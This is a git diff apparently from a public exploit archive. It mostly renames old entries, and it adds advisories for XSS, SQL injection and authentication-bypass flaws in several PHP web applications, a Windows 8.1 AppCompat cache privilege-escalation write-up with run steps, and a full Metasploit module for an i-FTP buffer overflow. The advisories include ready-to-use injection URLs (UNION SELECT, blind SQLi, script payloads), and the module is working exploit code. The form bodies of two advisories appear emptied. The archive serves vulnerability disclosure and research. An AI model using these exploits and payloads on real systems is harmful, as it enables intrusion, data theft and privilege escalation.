similarity index 100% rename from platforms/multiple/remote/19383 rename to platforms/multiple/remote/19383.txt diff --git a/platforms/multiple/remote/19443 b/platforms/multiple/remote/19443.txt similarity index 100% rename from platforms/multiple/remote/19443 rename to platforms/multiple/remote/19443.txt diff --git a/platforms/multiple/remote/19451 b/platforms/multiple/remote/19451.txt similarity index 100% rename from platforms/multiple/remote/19451 rename to platforms/multiple/remote/19451.txt diff --git a/platforms/multiple/remote/19459 b/platforms/multiple/remote/19459.txt similarity index 100% rename from platforms/multiple/remote/19459 rename to platforms/multiple/remote/19459.txt diff --git a/platforms/multiple/remote/19466 b/platforms/multiple/remote/19466.txt similarity index 100% rename from platforms/multiple/remote/19466 rename to platforms/multiple/remote/19466.txt diff --git a/platforms/multiple/remote/19492 b/platforms/multiple/remote/19492.txt similarity index 100% rename from platforms/multiple/remote/19492 rename to platforms/multiple/remote/19492.txt diff --git a/platforms/multiple/remote/19493 b/platforms/multiple/remote/19493.txt similarity index 100% rename from platforms/multiple/remote/19493 rename to platforms/multiple/remote/19493.txt diff --git a/platforms/netbsd_x86/local/19261 b/platforms/netbsd_x86/local/19261.txt similarity index 100% rename from platforms/netbsd_x86/local/19261 rename to platforms/netbsd_x86/local/19261.txt diff --git a/platforms/netware/local/19364 b/platforms/netware/local/19364.txt similarity index 100% rename from platforms/netware/local/19364 rename to platforms/netware/local/19364.txt diff --git a/platforms/netware/remote/19365 b/platforms/netware/remote/19365.txt similarity index 100% rename from platforms/netware/remote/19365 rename to platforms/netware/remote/19365.txt diff --git a/platforms/osx/local/19417 b/platforms/osx/local/19417.txt similarity index 100% rename from platforms/osx/local/19417 rename to platforms/osx/local/19417.txt diff --git a/platforms/osx/local/19427 b/platforms/osx/local/19427.txt similarity index 100% rename from platforms/osx/local/19427 rename to platforms/osx/local/19427.txt diff --git a/platforms/osx/local/19434 b/platforms/osx/local/19434.txt similarity index 100% rename from platforms/osx/local/19434 rename to platforms/osx/local/19434.txt diff --git a/platforms/osx/local/19437 b/platforms/osx/local/19437.txt similarity index 100% rename from platforms/osx/local/19437 rename to platforms/osx/local/19437.txt diff --git a/platforms/osx/local/19438 b/platforms/osx/local/19438.txt similarity index 100% rename from platforms/osx/local/19438 rename to platforms/osx/local/19438.txt diff --git a/platforms/osx/local/19439 b/platforms/osx/local/19439.txt similarity index 100% rename from platforms/osx/local/19439 rename to platforms/osx/local/19439.txt diff --git a/platforms/php/webapps/35662.txt b/platforms/php/webapps/35662.txt new file mode 100755 index 000000000..1b2cf1323 --- /dev/null +++ b/platforms/php/webapps/35662.txt @@ -0,0 +1,75 @@ +source: http://www.securityfocus.com/bid/47578/info + +Noah's Classifieds is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. + +
+ + + + + + +'> +description of my">

+'> + + + +
+ + +
+ + + + + + + +'> + + + + + + + + + + + + + + +
+ + +
+ + + + + + + + +'> + + + + + + + +
+ diff --git a/platforms/php/webapps/35663.txt b/platforms/php/webapps/35663.txt new file mode 100755 index 000000000..0a16a9294 --- /dev/null +++ b/platforms/php/webapps/35663.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47579/info + +The WP Ajax Recent Posts WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +WP Ajax Recent Posts WordPress Plugin 1.0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/?action=wpAjaxRecentPosts&number=1%27%29%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35664.txt b/platforms/php/webapps/35664.txt new file mode 100755 index 000000000..256c6d7f8 --- /dev/null +++ b/platforms/php/webapps/35664.txt @@ -0,0 +1,53 @@ +source: http://www.securityfocus.com/bid/47580/info + +PHPList is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +PHPList 2.10.13 is vulnerable; other versions may also be affected. + +
+ + + + + +'> + + + + + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/platforms/php/webapps/35665.txt b/platforms/php/webapps/35665.txt new file mode 100755 index 000000000..c90197889 --- /dev/null +++ b/platforms/php/webapps/35665.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/47582/info + +PHP F1 Max's Photo Album is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/showimage.php?id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/35666.txt b/platforms/php/webapps/35666.txt new file mode 100755 index 000000000..cf932a331 --- /dev/null +++ b/platforms/php/webapps/35666.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47593/info + +Football Website Manager is prone to an SQL-injection vulnerability and multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks. + +Football Website Manager 1.1 is vulnerable; other versions may also be affected. + +http://www.example.com/profile.php?fileId=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/35667.txt b/platforms/php/webapps/35667.txt new file mode 100755 index 000000000..002131175 --- /dev/null +++ b/platforms/php/webapps/35667.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/47595/info + +Multiple Joostina components are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the applications, access or modify data, or exploit latent vulnerabilities in the underlying database. + +The following components are vulnerable: + +'com_frontpage' 1.3.0.4_stable +'com_users' + +Other components may also be affected. + +http://www.example.com/[Path]/index.php?option=com_users&task=profile&user=11+AND+1=0 +http://www.example.com/[Path]/index.php?option=com_frontpage&Itemid=1&limit=4&limitstart=[SQL-Inj3cT-Here] \ No newline at end of file diff --git a/platforms/php/webapps/35668.txt b/platforms/php/webapps/35668.txt new file mode 100755 index 000000000..f72f820d5 --- /dev/null +++ b/platforms/php/webapps/35668.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/47599/info + +up.time software is prone to a remote authentication-bypass vulnerability. + +Attackers can exploit this issue to bypass authentication and perform unauthorized actions. + +up.time 5 is vulnerable; other versions may also be affected. + +http://www.example.com:9999/index.php?userid=admin +&firstTimeLogin=True +&password=admin +&confirmPassword=admin +&adminEmail=admin () admin +&monitorEmail=admin () admin \ No newline at end of file diff --git a/platforms/php/webapps/35670.txt b/platforms/php/webapps/35670.txt new file mode 100755 index 000000000..f7efec103 --- /dev/null +++ b/platforms/php/webapps/35670.txt @@ -0,0 +1,166 @@ +Advisory: Multiple SQL Injections and Reflecting XSS in Absolut Engine v.1.73 CMS + +Advisory ID: SROEADV-2014-08 + +Author: Steffen Rösemann + +Affected Software: CMS Absolut Engine v. 1.73 + +Vendor URL: http://www.absolutengine.com/ + +Vendor Status: solved + +CVE-ID: - + + + ========================== + +Vulnerability Description: + +========================== + + + The (not actively developed) CMS Absolut Engine v. 1.73 has multiple SQL +injection vulnerabilities and a XSS vulnerability in its administrative +backend. + + + ================== + +Technical Details: + +================== + + + The following PHP-Scripts are prone to SQL injections: + + + *managersection.php (via sectionID parameter):* + + + +*http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7§ionID=1* + + + *Exploit Example:* + + + +*http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7§ionID=1%27+and+1=2+union+select+1,version%28%29,3,4,5,6+--+* + + + *edituser.php (via userID parameter):* + + + +*http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3* + + + *Exploit Example:* + + + +*http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3%27+and+1=2+union+select+1,user%28%29,3,version%28%29,5,database%28%29,7,8,9+--+* + + + + *admin.php (via username parameter, BlindSQLInjection):* + + + +*http://{TARGET}/admin/admin.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7* + + + *Exploit Example:* + + + +*http://{TARGET}/admin/admin.php?username=admin%27+and+substring%28user%28%29,1,4%29=%27root%27+--+&session=c8d7ebc95b9b1a72d3b54eb59bea56c7* + + + *managerrelated.php (via title parameter):* + + + *http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title +={some_title}* + + + *Exploit Example:* + + + +*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title={some_title}%27+and+1=2+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12+--+* + + + The last PHP-Script is as well vulnerable to a Reflecting XSS +vulnerability. + + + *Exploit Example:* + + + +*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E* + + + Although this is a product which is not actively developed anymore, I +think it is worth mentioning as the idea (of the lists) are to keep +tracking (unknown) vulnerabilities in software products (but that is a +personally point of view). + + + Moreover, this product is still in use by some sites (!) and it is offered +without a hint of its status. + + + ========= + +Solution: + +========= + + + As the CMS is not actively developed, it shouldn't be used anymore. + + + ==================== + +Disclosure Timeline: + +==================== + +29-Dec-2014 – found the vulnerability + +29-Dec-2014 - informed the developers + +29-Dec-2014 – release date of this security advisory [without technical +details] + +30-Dec-2014 – Vendor responded, won't patch vulnerabilities + +30-Dec-2014 – release date of this security advisory + +30-Dec-2014 – post on FullDisclosure + + + + ======== + +Credits: + +======== + + + Vulnerability found and advisory written by Steffen Rösemann. + + + =========== + +References: + +=========== + + + http://www.absolutengine.com/ + +http://sroesemann.blogspot.de \ No newline at end of file diff --git a/platforms/solaris/dos/19042 b/platforms/solaris/dos/19042.txt similarity index 100% rename from platforms/solaris/dos/19042 rename to platforms/solaris/dos/19042.txt diff --git a/platforms/solaris/local/19126 b/platforms/solaris/local/19126.txt similarity index 100% rename from platforms/solaris/local/19126 rename to platforms/solaris/local/19126.txt diff --git a/platforms/solaris/local/19161 b/platforms/solaris/local/19161.txt similarity index 100% rename from platforms/solaris/local/19161 rename to platforms/solaris/local/19161.txt diff --git a/platforms/solaris/local/19232 b/platforms/solaris/local/19232.txt similarity index 100% rename from platforms/solaris/local/19232 rename to platforms/solaris/local/19232.txt diff --git a/platforms/solaris/local/19233 b/platforms/solaris/local/19233.txt similarity index 100% rename from platforms/solaris/local/19233 rename to platforms/solaris/local/19233.txt diff --git a/platforms/solaris/local/19235 b/platforms/solaris/local/19235.txt similarity index 100% rename from platforms/solaris/local/19235 rename to platforms/solaris/local/19235.txt diff --git a/platforms/solaris/local/19326 b/platforms/solaris/local/19326.txt similarity index 100% rename from platforms/solaris/local/19326 rename to platforms/solaris/local/19326.txt diff --git a/platforms/solaris/remote/19040 b/platforms/solaris/remote/19040.txt similarity index 100% rename from platforms/solaris/remote/19040 rename to platforms/solaris/remote/19040.txt diff --git a/platforms/solaris/remote/19044 b/platforms/solaris/remote/19044.txt similarity index 100% rename from platforms/solaris/remote/19044 rename to platforms/solaris/remote/19044.txt diff --git a/platforms/solaris/remote/19236 b/platforms/solaris/remote/19236.txt similarity index 100% rename from platforms/solaris/remote/19236 rename to platforms/solaris/remote/19236.txt diff --git a/platforms/unix/local/19068 b/platforms/unix/local/19068.txt similarity index 100% rename from platforms/unix/local/19068 rename to platforms/unix/local/19068.txt diff --git a/platforms/unix/local/19108 b/platforms/unix/local/19108.txt similarity index 100% rename from platforms/unix/local/19108 rename to platforms/unix/local/19108.txt diff --git a/platforms/windows/dos/19207 b/platforms/windows/dos/19207.txt similarity index 100% rename from platforms/windows/dos/19207 rename to platforms/windows/dos/19207.txt diff --git a/platforms/windows/dos/19372 b/platforms/windows/dos/19372.txt similarity index 100% rename from platforms/windows/dos/19372 rename to platforms/windows/dos/19372.txt diff --git a/platforms/windows/dos/19445 b/platforms/windows/dos/19445.txt similarity index 100% rename from platforms/windows/dos/19445 rename to platforms/windows/dos/19445.txt diff --git a/platforms/windows/dos/19489 b/platforms/windows/dos/19489.txt similarity index 100% rename from platforms/windows/dos/19489 rename to platforms/windows/dos/19489.txt diff --git a/platforms/windows/local/19144 b/platforms/windows/local/19144.txt similarity index 100% rename from platforms/windows/local/19144 rename to platforms/windows/local/19144.txt diff --git a/platforms/windows/local/19167 b/platforms/windows/local/19167.txt similarity index 100% rename from platforms/windows/local/19167 rename to platforms/windows/local/19167.txt diff --git a/platforms/windows/local/19192 b/platforms/windows/local/19192.txt similarity index 100% rename from platforms/windows/local/19192 rename to platforms/windows/local/19192.txt diff --git a/platforms/windows/local/19196 b/platforms/windows/local/19196.txt similarity index 100% rename from platforms/windows/local/19196 rename to platforms/windows/local/19196.txt diff --git a/platforms/windows/local/19198 b/platforms/windows/local/19198.txt similarity index 100% rename from platforms/windows/local/19198 rename to platforms/windows/local/19198.txt diff --git a/platforms/windows/local/19227 b/platforms/windows/local/19227.txt similarity index 100% rename from platforms/windows/local/19227 rename to platforms/windows/local/19227.txt diff --git a/platforms/windows/local/19359 b/platforms/windows/local/19359.txt similarity index 100% rename from platforms/windows/local/19359 rename to platforms/windows/local/19359.txt diff --git a/platforms/windows/local/19376 b/platforms/windows/local/19376.txt similarity index 100% rename from platforms/windows/local/19376 rename to platforms/windows/local/19376.txt diff --git a/platforms/windows/local/19425 b/platforms/windows/local/19425.txt similarity index 100% rename from platforms/windows/local/19425 rename to platforms/windows/local/19425.txt diff --git a/platforms/windows/local/19472 b/platforms/windows/local/19472.txt similarity index 100% rename from platforms/windows/local/19472 rename to platforms/windows/local/19472.txt diff --git a/platforms/windows/local/19473 b/platforms/windows/local/19473.txt similarity index 100% rename from platforms/windows/local/19473 rename to platforms/windows/local/19473.txt diff --git a/platforms/windows/local/35661.txt b/platforms/windows/local/35661.txt new file mode 100755 index 000000000..fdc4cd8d2 --- /dev/null +++ b/platforms/windows/local/35661.txt @@ -0,0 +1,20 @@ +## Source: https://code.google.com/p/google-security-research/issues/detail?id=118#c1 +## EDB mirror: http://exploit-db.com/sploits/35661-poc.zip + + +Platform: Windows 8.1 Update 32/64 bit (No other OS tested) + +On Windows 8.1 update the system call NtApphelpCacheControl (the code is actually in ahcache.sys) allows application compatibility data to be cached for quick reuse when new processes are created. A normal user can query the cache but cannot add new cached entries as the operation is restricted to administrators. This is checked in the function AhcVerifyAdminContext. + +This function has a vulnerability where it doesn't correctly check the impersonation token of the caller to determine if the user is an administrator. It reads the caller's impersonation token using PsReferenceImpersonationToken and then does a comparison between the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level of the token so it's possible to get an identify token on your thread from a local system process and bypass this check. For this purpose the PoC abuses the BITS service and COM to get the impersonation token but there are probably other ways. + +It is just then a case of finding a way to exploit the vulnerability. In the PoC a cache entry is made for an UAC auto-elevate executable (say ComputerDefaults.exe) and sets up the cache to point to the app compat entry for regsvr32 which forces a RedirectExe shim to reload regsvr32.exe. However any executable could be used, the trick would be finding a suitable pre-existing app compat configuration to abuse. + +It's unclear if Windows 7 is vulnerable as the code path for update has a TCB privilege check on it (although it looks like depending on the flags this might be bypassable). No effort has been made to verify it on Windows 7. NOTE: This is not a bug in UAC, it is just using UAC auto elevation for demonstration purposes. + +The PoC has been tested on Windows 8.1 update, both 32 bit and 64 bit versions. I'd recommend running on 32 bit just to be sure. To verify perform the following steps: + +1) Put the AppCompatCache.exe and Testdll.dll on disk +2) Ensure that UAC is enabled, the current user is a split-token admin and the UAC setting is the default (no prompt for specific executables). +3) Execute AppCompatCache from the command prompt with the command line "AppCompatCache.exe c:\windows\system32\ComputerDefaults.exe testdll.dll". +4) If successful then the calculator should appear running as an administrator. If it doesn't work first time (and you get the ComputerDefaults program) re-run the exploit from 3, there seems to be a caching/timing issue sometimes on first run. \ No newline at end of file diff --git a/platforms/windows/local/35671.rb b/platforms/windows/local/35671.rb new file mode 100755 index 000000000..cdfa3e3e5 --- /dev/null +++ b/platforms/windows/local/35671.rb @@ -0,0 +1,95 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Remote::Seh + include REXML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'i-FTP Schedule Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability in + i-Ftp v2.20, caused by a long time value set for scheduled download. + By persuading the victim to place a specially-crafted Schedule.xml file + in the i-FTP folder, a remote attacker could execute arbitrary code on + the system or cause the application to crash. This module has been + tested successfully on Windows XP SP3. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'metacom', # Vulnerability discovery and PoC + 'Gabor Seljan' # Metasploit module + ], + 'References' => + [ + [ 'EDB', '35177' ], + [ 'OSVDB', '114279' ], + ], + 'DefaultOptions' => + { + 'ExitFunction' => 'process' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d\x20\x22", + 'Space' => 2000 + }, + 'Targets' => + [ + [ 'Windows XP SP3', + { + 'Offset' => 600, + 'Ret' => 0x1001eade # POP ECX # POP ECX # RET [Lgi.dll] + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Nov 06 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'Schedule.xml']) + ], + self.class) + + end + + def exploit + + evil = rand_text_alpha(target['Offset']) + evil << generate_seh_payload(target.ret) + evil << rand_text_alpha(20000) + + xml = Document.new + xml << XMLDecl.new('1.0', 'UTF-8') + xml.add_element('Schedule', {}) + xml.elements[1].add_element( + 'Event', + { + 'Url' => '', + 'Time' => 'EVIL', + 'Folder' => '' + }) + + sploit = '' + xml.write(sploit, 2) + sploit = sploit.gsub(/EVIL/, evil) + + # Create the file + print_status("Creating '#{datastore['FILENAME']}' file ...") + file_create(sploit) + + end +end \ No newline at end of file diff --git a/platforms/windows/remote/19094 b/platforms/windows/remote/19094.txt similarity index 100% rename from platforms/windows/remote/19094 rename to platforms/windows/remote/19094.txt diff --git a/platforms/windows/remote/19113 b/platforms/windows/remote/19113.txt similarity index 100% rename from platforms/windows/remote/19113 rename to platforms/windows/remote/19113.txt diff --git a/platforms/windows/remote/19147 b/platforms/windows/remote/19147.txt similarity index 100% rename from platforms/windows/remote/19147 rename to platforms/windows/remote/19147.txt diff --git a/platforms/windows/remote/19152 b/platforms/windows/remote/19152.txt similarity index 100% rename from platforms/windows/remote/19152 rename to platforms/windows/remote/19152.txt diff --git a/platforms/windows/remote/19156 b/platforms/windows/remote/19156.txt similarity index 100% rename from platforms/windows/remote/19156 rename to platforms/windows/remote/19156.txt diff --git a/platforms/windows/remote/19164 b/platforms/windows/remote/19164.txt similarity index 100% rename from platforms/windows/remote/19164 rename to platforms/windows/remote/19164.txt diff --git a/platforms/windows/remote/19197 b/platforms/windows/remote/19197.txt similarity index 100% rename from platforms/windows/remote/19197 rename to platforms/windows/remote/19197.txt diff --git a/platforms/windows/remote/19208 b/platforms/windows/remote/19208.txt similarity index 100% rename from platforms/windows/remote/19208 rename to platforms/windows/remote/19208.txt diff --git a/platforms/windows/remote/19238 b/platforms/windows/remote/19238.txt similarity index 100% rename from platforms/windows/remote/19238 rename to platforms/windows/remote/19238.txt diff --git a/platforms/windows/remote/19239 b/platforms/windows/remote/19239.txt similarity index 100% rename from platforms/windows/remote/19239 rename to platforms/windows/remote/19239.txt diff --git a/platforms/windows/remote/19361 b/platforms/windows/remote/19361.txt similarity index 100% rename from platforms/windows/remote/19361 rename to platforms/windows/remote/19361.txt diff --git a/platforms/windows/remote/19468 b/platforms/windows/remote/19468.txt similarity index 100% rename from platforms/windows/remote/19468 rename to platforms/windows/remote/19468.txt diff --git a/platforms/windows/remote/19487 b/platforms/windows/remote/19487.txt similarity index 100% rename from platforms/windows/remote/19487 rename to platforms/windows/remote/19487.txt diff --git a/platforms/windows/remote/19490 b/platforms/windows/remote/19490.txt similarity index 100% rename from platforms/windows/remote/19490 rename to platforms/windows/remote/19490.txt diff --git a/platforms/windows/remote/19491 b/platforms/windows/remote/19491.txt similarity index 100% rename from platforms/windows/remote/19491 rename to platforms/windows/remote/19491.txt